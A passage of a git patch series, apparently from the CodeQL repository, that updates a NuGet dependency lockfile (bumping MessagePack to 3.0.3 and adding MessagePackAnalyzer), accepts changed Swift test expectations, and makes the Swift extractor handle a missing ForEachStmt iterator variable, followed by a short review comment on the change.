"Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net7.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net8.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net9.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.2": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], 
"netstandard1.6": [], "netstandard2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Basic.CompilerLog.Util", "id": "Basic.CompilerLog.Util", "version": "0.9.4", "sha512": "sha512-VJMBSOOcdPD6ihA5k1gnVkDbH9GCABmx1055fFikEImT2dFp4yZhN7zMd8PW14tIb3BXIieP557n8xE+J2Y8Dw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net462": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net47": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net471": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net472": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net48": ["MSBuild.StructuredLogger", "MessagePack", 
"Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net5.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net6.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net7.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net8.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net9.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.2": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", 
"Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Humanizer.Core", "id": "Humanizer.Core", "version": "2.14.1", "sha512": "sha512-yzqGU/HKNLZ9Uvr6kvSc3wYV/S5O/IvklIUW5WF7MuivGLY8wS5IZnLPkt7D1KW8Et2Enl0I3Lzg2vGWM24Xsw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "MessagePack", "id": "MessagePack", "version": "2.5.192", "sha512": 
"sha512-SnrwSQIKWfxcQvzE1TCUPvJ7A/44KFBDcmCc+YUDIq8QalCf0bGAjiBoAFewhJ81QuS5FsCNCOcKn+IURYlbAQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net48": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net5.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net7.0": 
["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net8.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net9.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", 
"System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "MessagePack.Annotations", "id": "MessagePack.Annotations", "version": "2.5.192", "sha512": "sha512-pE/SD2N0+nDAU8BtTHqjyIhLM2L5Mb0NiO4hW0ybiv2I+BbK0JEaGtbKpeEmOvKT+5s2hds0gvk/GrAHhgcpdw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MessagePack", "id": "MessagePack", "version": "3.0.3", "sha512": "sha512-rFOP00M8dZRRVVjg11M79hU9lhMziIkmqIc9CQ9QhK0R+us1mmpuEGwvnFupqN4F3zYEEoAM36SAdVC+i+mw+Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", 
"System.Runtime.CompilerServices.Unsafe"], "net47": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net48": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net5.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "net6.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "net7.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "net8.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools"], "net9.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["MessagePackAnalyzer", "MessagePack.Annotations", 
"Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "netcoreapp3.1": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["MessagePackAnalyzer", "MessagePack.Annotations", "Microsoft.NET.StringTools", "System.Collections.Immutable"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MessagePack.Annotations", "id": "MessagePack.Annotations", "version": "3.0.3", "sha512": "sha512-LYOfElsnLTHsEs7VRd07mBiQjJos15mst8jP0v0zRx+t1OgUMUbbmQx6yO2fOww7vCyaX7vwXsoNuVJSdJdHPA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], 
"netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MessagePackAnalyzer", "id": "MessagePackAnalyzer", "version": "3.0.3", "sha512": "sha512-gsMDGQbQv5dwGGKo2N6mC4TvIVaqKHqowgtqOMcVDLPnYUFdCViW2A+sssnBXJLR4m+zbFVHI7EBSR86svG+AQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.Bcl.AsyncInterfaces", "id": "Microsoft.Bcl.AsyncInterfaces", "version": "9.0.0", "sha512": "sha512-bYp2ksSR5uB6xqOa4NyD2gBOeFrc2n8FAWoh781MNMDcPjk1ysD7DNpv7r7sQOXfdFJT6F/syX7fN4lmUsn+RQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Threading.Tasks.Extensions"], "net462": ["System.Threading.Tasks.Extensions"], "net47": ["System.Threading.Tasks.Extensions"], "net471": ["System.Threading.Tasks.Extensions"], "net472": ["System.Threading.Tasks.Extensions"], "net48": ["System.Threading.Tasks.Extensions"], "net5.0": [], 
"net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["System.Threading.Tasks.Extensions"], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Threading.Tasks.Extensions"], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.Build", "id": "Microsoft.Build", "version": "17.12.6", "sha512": "sha512-YEiL5xKowbwnr52YroALNHg8YurjLyFTlhv3USrswhubuxN2ldY1TmQpBKQ4K28UgWJV9BxTVXY9/CecMNDeOA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Memory", "System.Reflection.MetadataLoadContext", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net48": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Memory", "System.Reflection.MetadataLoadContext", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Configuration.ConfigurationManager", "System.Reflection.MetadataLoadContext", "System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], 
"netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.Build.Framework", "id": "Microsoft.Build.Framework", "version": "17.12.6", "sha512": "sha512-UjfxnrQN9BPVtO0Kvv2FB5dpN2CX5snc7coq5vVQdbCV6kdSpI/r+GZTLvU/5BTT8y8bvIUqoocxRR674N6bWg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net7.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net8.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], 
"netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, From a4f7981d9326850094d8ed870e0b77581db6c6f6 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 6 Dec 2024 14:44:01 +0100 Subject: [PATCH 0881/1267] Swift: accept test changes --- .../stmt/ForEachStmt/CONSISTENCY/CfgConsistency.expected | 2 ++ swift/ql/test/library-tests/ast/PrintAst.expected | 7 +++---- 2 files changed, 5 insertions(+), 4 deletions(-) create mode 100644 swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/CONSISTENCY/CfgConsistency.expected diff --git a/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/CONSISTENCY/CfgConsistency.expected b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/CONSISTENCY/CfgConsistency.expected new file mode 100644 index 00000000000..d238c6b5a40 --- /dev/null +++ b/swift/ql/test/extractor-tests/generated/stmt/ForEachStmt/CONSISTENCY/CfgConsistency.expected @@ -0,0 +1,2 @@ +deadEnd +| for.swift:12:33:12:56 | array | diff --git a/swift/ql/test/library-tests/ast/PrintAst.expected b/swift/ql/test/library-tests/ast/PrintAst.expected index 07713e4c28d..879de94c833 100644 --- a/swift/ql/test/library-tests/ast/PrintAst.expected +++ b/swift/ql/test/library-tests/ast/PrintAst.expected 
@@ -3310,12 +3310,11 @@ cfg.swift: # 533| getBase().getFullyConverted(): [LoadExpr] (AsyncStream) ... #-----| getMethodRef(): [DeclRefExpr] makeAsyncIterator() # 533| getPattern(0): [NamedPattern] $i$generator -# 533| getNextCall(): [CallExpr] call to next(isolation:) -# 533| getFunction(): [MethodLookupExpr] .next(isolation:) +# 533| getNextCall(): [CallExpr] call to next() +# 533| getFunction(): [MethodLookupExpr] .next() # 533| getBase(): [DeclRefExpr] $i$generator # 533| getBase().getFullyConverted(): [InOutExpr] &... -#-----| getMethodRef(): [DeclRefExpr] next(isolation:) -# 533| getArgument(0): (no string representation) +#-----| getMethodRef(): [DeclRefExpr] next() # 533| getNextCall().getFullyConverted(): [AwaitExpr] await ... # 533| getBody(): [BraceStmt] { ... } # 534| getElement(0): [CallExpr] call to print(_:separator:terminator:) From a82d37e05c6893e500b66e653af76ee118e8b24d Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 6 Dec 2024 14:45:24 +0100 Subject: [PATCH 0882/1267] Swift: fix gracefully accepting missing `ForEachStmt.iteratorVar` --- swift/extractor/translators/StmtTranslator.cpp | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/swift/extractor/translators/StmtTranslator.cpp b/swift/extractor/translators/StmtTranslator.cpp index f46411e6f12..00c4b94fa85 100644 --- a/swift/extractor/translators/StmtTranslator.cpp +++ b/swift/extractor/translators/StmtTranslator.cpp @@ -74,7 +74,7 @@ codeql::ForEachStmt StmtTranslator::translateForEachStmt(const swift::ForEachStm fillLabeledStmt(stmt, entry); entry.body = dispatcher.fetchLabel(stmt.getBody()); entry.pattern = dispatcher.fetchLabel(stmt.getPattern()); - entry.iteratorVar = dispatcher.fetchLabel(stmt.getIteratorVar()); + entry.iteratorVar = dispatcher.fetchOptionalLabel(stmt.getIteratorVar()); entry.where = dispatcher.fetchOptionalLabel(stmt.getWhere()); entry.nextCall = dispatcher.fetchOptionalLabel(stmt.getNextCall()); auto add_variable = [&](swift::VarDecl* var) { 
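Review bot: The `entry.iteratorVar` line now uses `fetchOptionalLabel`, but nothing at the call site says when `stmt.getIteratorVar()` can be null, and the commit's diffstat lists only `StmtTranslator.cpp`. If the `ForEachStmt` schema still declares `iteratorVar` as mandatory (not visible here), a statement extracted without it would presumably show up as a database inconsistency rather than a clean missing value, so the schema side should be checked against this change. I would add a comment above the line, e.g. `// getIteratorVar() may be null; emit no iteratorVar instead of failing extraction`. `translateForEachStmt` starts and ends outside the hunk.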
